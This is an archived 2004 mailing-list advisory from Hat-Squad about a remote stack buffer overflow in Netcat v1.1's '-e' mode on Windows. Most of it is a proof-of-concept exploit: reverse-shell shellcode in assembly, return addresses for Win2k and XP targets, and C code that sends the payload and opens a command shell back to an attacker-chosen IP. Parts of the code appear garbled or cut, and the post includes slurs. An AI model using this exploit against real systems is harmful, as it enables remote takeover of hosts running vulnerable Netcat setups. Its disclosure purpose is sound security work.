[VulnWatch] [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc inside.

From: class 101 (class101_at_gmail.com)
Date: 12/27/04

  • Next message: Chris Wysopal: "[VulnWatch] Re: [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc inside."
    To: <vulnwatch@vulnwatch.org>
    Date: Mon, 27 Dec 2004 09:48:20 +0100

    December 26, 2004
    Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife

    Product: Netcat - nc11nt.zip
    Vendor Url: http://www.securityfocus.com/tools/139/scoreit
    Version: Netcat v1.1
    Vulnerability: Remote stack overflow in the DNS control part
    Release Date: 26 December, 2004

    Vendor Status:
    Informed on 10 November 2004
    Response: 11 November 2004
    No fix


    The program 'netcat' is an advanced form of the Telnet command when used in a hackers hands. Netcat is a simple Unix utility which reads
    and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used
    directly or easily driven by other programs and scripts. At the same time, it can also be used as a network debugging and exploration tool,
    since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
    Standard input is normally sent to the host, and anything that comes back across the connection is sent to standard output.
    This continues indefinitely, until the network side of the connection shuts down.
    Netcat can also function as a server, by listening for inbound connections on arbitrary ports and then doing the same reading and writing.


    1. Stack based Buffer Overflow:

    Due to a boundary check bug in the DNS part, sending a client command with more than
    256 bytes will cause a stack buffer overflow.
    This vulnerability can compromise several tools working without port listener as the
    the set of tools "uw-imapd" (www.washington.edu/imap/), loaded with netcat , this is tested wulnerable.
    Read the PoC code if you need more informations on this vulnerability.

    Discovery and Proof Of Concept Exploit by class101 (class101@hat-squad.com)
    Greetings to Nima Majidi and Behrang Fouladi!




          Netcat v1.1, "-e" Switch, Remote Buffer Overflow Exploit v0.1


      Homepage..........: http://www.securityfocus.com/tools/139/scoreit

      Affected versions.: v1.1

      Fix...............: Actually none, Hobbit is warned 1 month+ ago, and looks like
              to not act, we let him to spread a backdoor :)

      Risk..............: Highly critical.

                            -Almost everything loaded as "nc ... -e ..." is vulnerable
          -Educational tools such as the uw-imapd (http://www.washington.edu/imap/) contains no port listener,
          if it's loaded with netcat (ie: nc -L -p 143 -t -e imapd.exe
                                                   25 -t -e pop3d.exe etc..vulnerable..)
             this small example show you the large impact of this hole.
          -Tools build on netcat , I guess are vulnerable , such as the netcat with
          authentification or others tools based on netcat without a security check on src.
          -Next time you run netcat -e , be sure of what you run because as said Hobbit,
          the "-e" switch is really DANGEROUS!! :DDD

      Compilation.......: 101_ncat.cpp ......... Win32 (MSVC,cygwin)
                          101_ncat.c ........... Linux (FreeBSD,etc..)

      Greetings.........: Nima Majidi, Behrang Fouladi (cool teammates ;p)
                          DiabloHorn, kimatrix (KD-Team guys)
                          Nicolas Waisman, MMiller(skape), H.D Moore, BJWever (for the help)
           Brett Moore (for all help and specially there
           for suggesting me that way of MSVCRT.system call

                                   ; call system()
                                 mov eax,1656E64h ; mov cmd + 01010101 to eax
                                 sub eax,01010101h ; sub 01010101
                                 push eax ; Push cmd on stack with our null byte :)
                                 push esp ; Location to cmd
                                 call ebp ; Call system()

                          via that way you can push on the stack "\x00"cmd without
           breaking your payload.
           Because in the public shellcode that he published on mailinglist

               ; Call system()
            push 20646D63h ; Push cmd on stack, null exists from above
            push esp ; Location to cmd
            call ebp ; Call system()

              Sure it's smaller to push direclty "\x20"cmd but
           MSVCRT.system was also grabbing invalid unicode chars
           before "\x20"cmd including esp pointing to cmd (windows bug ?:>)(on w2k sp4 server).
           Else to bypass a bad char , I do a small change ,adding 6 nop,
           to kick out "\x0A" bugging there for netcat and prolly more.
           This to finally say that the size of the shellcode is now 220 bytes instead
           of 205 (still awesome for a reversecmd generic win32 shellcode)
           Tested working on W2k SP4,XP all SP. Excellent job by Brett Moore wich I throw all credits
           because this shellcode is the brain of that exploit ;)

      Extra.............: !All tests were made on nc.exe from http://www.securityfocus.com/tools/139/scoreit!
                          !All tests were made loading netcat: nc -L -p 143 -t -e c:\imapd.exe!
                          (hoping the processus wont change if you load differently netcat, I dont think, else update urself!
                          !See in the code if you need the shellcode in ASM format, really useful peace of code, thanx to bmoore and me!
           !Don't use ip with #0 as '' , this will break the payload.

      Bug discovery.....: class101
      Exploit code......: class101 at www.hat-squad.com - dfind.kd-team.com - #n3ws EFnet

      Quizz.............: Wich crew is enough stupid to spread perl worm codes ?

                    K _ O _ i _

                       easy ;>

    #include <stdio.h>
    #include <string.h>
    #include <time.h>
    #ifdef WIN32
    #include "winsock2.h"
    #pragma comment(lib, "ws2_32")
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <fcntl.h>

    // GENERIC callback cmd execution shellcode
    // by Brett Moore @ Security-Assessment.com
    // 205 bytes + 8 bytes to bypass null byte problem spoke ealier. bmoore
    // + 6 nop added to avoid bad char "\x0A". class101
    // + 1 bytes of CMP&JMP instruction added to fix an important bug. class101
    // (shellcode was spawning a shell if you use it locally,
    // but access violation trying to spawn a shell on remote ip, now fixed.)
    // = 220 bytes

    char scode[] =


    ;*********************************** Christmas Shells***************************************
    ; Callback Shell.
    ; Directly set std handles and call system()
    ; 220 (DCh) bytes
    ; its not code, its antic0de
    ; and it works now too %-)
    ; Left it in tasm format.
    ; tasm32 -ml /m5 bmoore.asm
    ; tlink32 -Tpe -c -x bmoore.obj ,,, import32
    ;*********************************** Christmas Shells***************************************
    ; Jimminy jellicas its been jimplemented.
    ; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
    ; All the o/s peeps who know whats what.
    ; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.

    .model flat, stdcall
    extrn ExitProcess:PROC
    extrn WSAStartup:PROC
    extrn WSACleanup:PROC

    wsadescription_len equ 256
    wsasys_status_len equ 128

    WSAdata struct
    wVersion dw ?
    wHighVersion dw ?
    szDescription db wsadescription_len+1 dup (?)
    szSystemStatus db wsasys_status_len+1 dup (?)
    iMaxSockets dw ?
    iMaxUdpDg dw ?
    lpVendorInfo dw ?
    WSAdata ends

    wsadata WSAdata <?>

    ; Winsock + copy to stack code

     push offset wsadata
     push 0101h
     call WSAStartup
     or eax, eax
     jz winsock_found
     jmp codeend


     mov ebx,offset realstart
     sub esp,400h
     mov eax,esp


     mov cl,byte ptr [ebx]
     mov byte ptr [eax],cl
     inc eax
     inc ebx
     cmp ebx,offset codeend
     jle Copyit
     jmp esp

    ; This is the start of the shell code


     jmp over_data
     sockdat db 02h,01h,00h,065h
             db 07fh,00h,00h,01h

    hashes db 01h
     dw 364Ah
     db "MSVCRT",01
     dw 422Ah
     dw 8AD4h
     db "WS2_32",01
     dw 817Ch
     dw 4E2Ch


        push 0ACC3575Fh
     call esp
     mov esi,7ffdf00ch
     push dword ptr [esi]
     mov esi,[eax + 1ch]
     mov edx,[eax + 08h]
     push -8
     lea ebx,[edi-8]


     push esp
     pop ebp
     mov ecx,dword ptr [edx + 3ch]
     mov esi,dword ptr [ecx + edx + 78h]
     lea esi,dword ptr [esi + edx + 1ch]
     mov cl,3


     add eax,edx
     push eax
     loop short StoreAddress


     dec ebx
     mov esi,dword ptr [ebp - 8]
     xor eax,eax
     push eax


     push eax
        add eax,edx
     xor ecx,ecx


     add cx,word ptr [eax]
     add cl,byte ptr [eax]
     inc eax
     cmp byte ptr [eax],01
     jge hashy
     pop eax
     inc eax
     cmp cx,[ebx]
     jne Search
     pop esi
     xchg esi,eax
     dec esi
     shl esi,1
        add esi,dword ptr [ebp - 0ch]
        shl eax,2
        add eax,dword ptr [ebp - 4h]
     xchg esi,eax
        add eax,edx
     dec ebx
     cmp byte ptr [ebx],01h
     jne short SearchStart
     dec byte ptr [ebx]
     sub ebx,06h
     cmp byte ptr [ebx-1],01h
     je short Done_Finding
     push ebx
     call dword ptr [edi + ebp]
     xchg edx,eax
     push -16
     dec ebx
     jne short LookupFunctions

     xchg eax,ebp
     call [EDI - 10h]
     xor ecx,ecx
     push ecx
     push ecx
     push ecx
     push ecx
     inc ecx
     push ecx
     inc ecx
     push ecx
     call [EDI - 08h]
     xchg ecx,edi
     pop edi
     add edi,18h
     dec ebx
     dec byte ptr [ebx]
     dec ebx
     push ebx
     push ebx
     push eax
     call [ecx - 0ch]
     mov eax,1656E64h
     sub eax,01010101h
     push eax
     push esp
     call ebp
     call WSACleanup


        end start


    static char payload[1000];

    char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
    char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation ;<
    char jmp1[]="\xeb\x07\x90"; file://JMP 9 bytes down
    char jmp2[]="\x90\x90\x90\xe9\x07\xff\xff\xff"; file://long JMP up
    char gay[]="\x4b\x2d\x4f\x54\x69\x4b"; file://giving bl0wjob for free :>

    #ifdef WIN32
     WSADATA wsadata;

    void ver();
    void usage(char* us);

    int main(int argc,char *argv[])
     unsigned long gip;
     unsigned short gport;
     if ((argc!=6)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
    #ifndef WIN32
    #define Sleep sleep
    #define SOCKET int
    #define closesocket(s) close(s)
     if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
     int ip=htonl(inet_addr(argv[2])), port=atoi(argv[3]), sz, sizeA, sizeB, sizeC, c, b, a;
     char *target, *os;
     memcpy(&scode[6], &gip, 4);
     memcpy(&scode[4], &gport, 2);
     if (atoi(argv[1]) == 1){target=jmpebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English";}
     if (atoi(argv[1]) == 2){target=popopret;os="WinXP SP2 Pro. English\n[+] WinXP SP1a Pro. English\n[+] WinXP SP1 Pro. English";}
     SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
     if (s==-1){printf("[+] socket() error\n");return -1;}
     printf("[+] target(s): %s\n",os);
     connect(s,( struct sockaddr *)&server,sizeof(server));
      case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
      case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
       printf("[+] connected, constructing the payload...\n");
    #ifdef WIN32
       for (a=0;a<sizeA;a++){strcat(payload,"\x90");}
       for (b=0;b<sizeB;b++){strcat(payload,"\x90");}
       for (c=0;c<sizeC;c++){strcat(payload,"\x90");}
       if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
    #ifdef WIN32
       printf("[+] size of payload: %d\n",sz);
       printf("[+] payload send, look at your listener, you should get a shell\n");
       return 0;
    #ifdef WIN32
     return 0;

    void usage(char* us)
     printf("USAGE: 101_ncat.exe Target VulnIP VulnPORT GayIP GayPORT\n");
     printf("TARGETS: \n");
     printf(" [+] 1. Win2k SP4 Server English (*)\n");
     printf(" [+] 1. Win2k SP4 Pro. English (*)\n");
     printf(" [+] 2. WinXP SP1 Pro. English (*)\n");
     printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
     printf(" [+] 2. WinXP SP2 Pro. English (*)\n");
     printf("NOTE: \n");
     printf(" The exploit reverse a cmd to GayIP:GayPORT :>\n");
     printf(" A wildcard (*) mean Tested.\n");
    void ver()
     printf(" \n");
     printf(" ===================================================[v0.1]====\n");
     printf(" ==========Netcat v1.1, The TCP/IP Swiss Army Knife===========\n");
     printf(" =========\"-e\" Switch, Remote Buffer Overflow Exploit=========\n");
     printf(" ======coded by class101=============[Hat-Squad.com 2004]=====\n");
     printf(" =============================================================\n");
     printf(" \n");


  • Next message: Chris Wysopal: "[VulnWatch] Re: [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc inside."

    Relevant Pages